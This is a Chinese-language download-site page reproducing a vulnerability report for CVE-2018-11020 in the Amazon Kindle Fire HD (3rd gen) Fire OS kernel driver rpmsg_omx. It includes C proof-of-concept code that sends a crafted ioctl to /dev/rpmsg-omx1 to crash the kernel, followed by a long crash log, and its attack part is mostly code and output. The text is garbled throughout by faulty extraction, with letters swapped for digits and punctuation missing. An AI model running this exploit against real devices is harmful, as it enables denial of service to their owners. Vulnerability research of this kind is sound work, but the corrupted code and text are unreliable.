(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
-
资源ID:794871
资源大小:37.99KB
全文页数:10页
- 资源格式: DOCX
下载积分:3金币
快捷下载
账号登录下载
微信登录下载
三方登录下载:
|
友情提示
2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
|
(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
(CVE-2018-11020)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversrpmsgrpmsg_omx.c允许攻击者通过设备文件/dev/rpmsg上的ioct1的参数注入特制的参数使用命令3221772291的omx1,并导致内核崩溃。要探索此漏洞,必须打开设备文件devrpmsg-omx1,并使用命令3221772291和精心设计的有效负载作为第三个参数来对该设备文件进行ioct1系统调用。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevrpmsg-omx1causesthesystemcrashviaIOCT13221772291.* Re1atedbuggystructnameisgcicommit.* ThisPocshou1drunwithpermissiontodoioct1ondevrpmsg-om×1.* Thefow11wingiskmsgofkerne1crashinfomation:*/#inc1ude<stdio.h>#inc1ude<fcnt1.h>#inc1ude<errno.h>#inc1ude<sysioct1.h>conststaticchar*driver="devrpmsg-omx1"staticcommand=3221772291;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xb5d18de2,0×f6e48a17j0×9179c429,0×89a32e03;intfd=0;fd=open(driverjO_RDWR);if(fd<0)printf("Fai1edtoopen%s,witherrno%dn,driver,errno);system(',echo1>data1oca1tmp1og");return-1;printf("Tryopen%swithcommand0×%x.n,>driver,command);printf("Systemwi11crashandreboot.n");if(ioct1(fdjcommand,Spay1oad)<0)printf("A11ocationofstructsfai1ed,%dn"jerrno);system(',echo2>/data/IOCaItmp1og");return-1;c1ose(fd);return0;崩溃日志146.290710Unab1etohand1ekerne1pagingrequestatvirtua1addressb5d18de6146.299438pgd=d72dc000146.302795b5d18de6*pgd=00000000146.307281Interna1error:Oops:5#1PREEMPTSMPARM146.313232Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1oggen(0)146.320983CPU:0Tainted:GO(3.4.83-gd2afc0bae69#1)146.328308PCisation_free+0xc0xb4146.3326721Risatrpmsg_omx_ioct1+0x2cc/0x598146.337890pc:<c02e8540>Ir:<c048a120>psr:60000013146.337890sp:c35b5e60ip:c35b5e80fp:c35b5e7c146.350860r10:c35b5ea8r9:de88c4d8r8:c35b4000f8146.356872r7:dd32b580r6:00000003r5:d71d5880r4:be92f500146.364135r3:d71d58ecr2:d71d58ecr1:b5d18de2r0:d7aaaa146.371551F1ags:nZCvIRQsonFIQsonModeSVC_32ISAARMSegmentuser146.379516Contro1:10c5387dTab1e:972dc04aDAC:00000015146.386077146.386077PC:0xc02e84c0:146.39105284c00a000001058e2433001e5853058e2871010ebfddc25e1a00006eb0ee904e5953146.40158084e0e353000003fe285005ce5933cba000011Ia0009e1a0200de3c23d7fe3c33146.4122928500e593723c006eb0ee876e1a00005e1a01007ebf90a76e597321ce585306ce1a00146.4228218520ebffffb400de92dd878e24cb004e1a00004ebf8e011e89da8f0e7f001f2e1a0c146.4335028540e5915004006eb0ee8e2e5953010e1a04001e15500001a000021e2856014e1a00146.4441838560e3530000008e353000090a000005e243200ce15400022a00000ae5933146.4548648580e59f0054e3001219006eb0ee856e89da878e59f2050e59f3050ebf58268e1a00146.46539385a0859330048affffedf93e3320000Iafffffa146.476074146.4760741R:0×c048a0a0:f57ff05fe1943f9fe2433001e1842146.481048a0a033a03000e3530000008e1a0000aebf7305eIaffffaee24ba05ce1a01004e3a02146.491729a0c0e3500000Iaffffaa000e50b005c0a000001e5950068e51b1058ebf97677e3500146.502380a0e0e3700a019affffc8018eaffff8ee1a00004e3a03000e50b305ceaffffc5e3e00146.513061a100e1a0100ae3a02008fc2e5950068ebf97904ebf73154e35000000affff88eafff146.523590a120eaffffb9e24b005c03ce1a03006e58d2000e3a01030ebf7398be3a02030e5970146.534240a140e59f1280e59f2274004e7933101e3530000ebf99069e3e0000deaffff78e5933146.544921a1600affff6ce5950068a018a00001fe5950068ebf97651e25090000a000021e3790146.555603a180e1a01009e24b206405c0affff9be59f322c146.566131146.566131SP:0xc35b5de0:e24b3060ebf97447e3500000050b9146.5712285de000000004d8cc50f454060000013ffffffff600100130000000100000001c02e8146.5817875e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.5924375e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6031185e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C048a120C02e8146.6138305e60d71d58ecbe92f5f8e80C048a120C02e8540d71d588000000003c35b5f04c35b5146.6243895e80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.6350705ea0C00723a0000fffff00100000000C35b5f14b5d18de2f6e48a170000000200000146.6455995ec00000000000000001ee0c02089fc00000000146.656158146.656158IP:0xc35b5e00:de88c4d8c25d7c00c35b5efcc35b5146.6612545e00c35b5e4cc35b4000370d7aaaa00b5d18de2c35b5e7cc35b5e18C06a5318C0008146.6719365e20d71d58ecd71d58ec580c35b4000de88c4d8be92f5f8d71d588000000003dd32b146.6824955e40c35b5ea8c35b5e7c54060000013ffffffffc35b5e80c35b5e60C048a120C02e8146.6931765e60d71d58ecbe92f5f8d71d588000000003c35b5f04c35b5e80C048a120C02e8540146.703704Se80c35b5edcc35b5e90e40c35b5ed4c35b5ea8C0207454C00bd9200000001ed7333146.7142635ea0C00723a0000fffff00100000000c35b5f14b5d18de2f6e48a170000000200000146.7249145ec00000000000000001ee0c02089fc00000000de88c4d8c25d7c00c35b5efcc35b5146.7355955ee0d72400c000000004000C35b5f74C35b
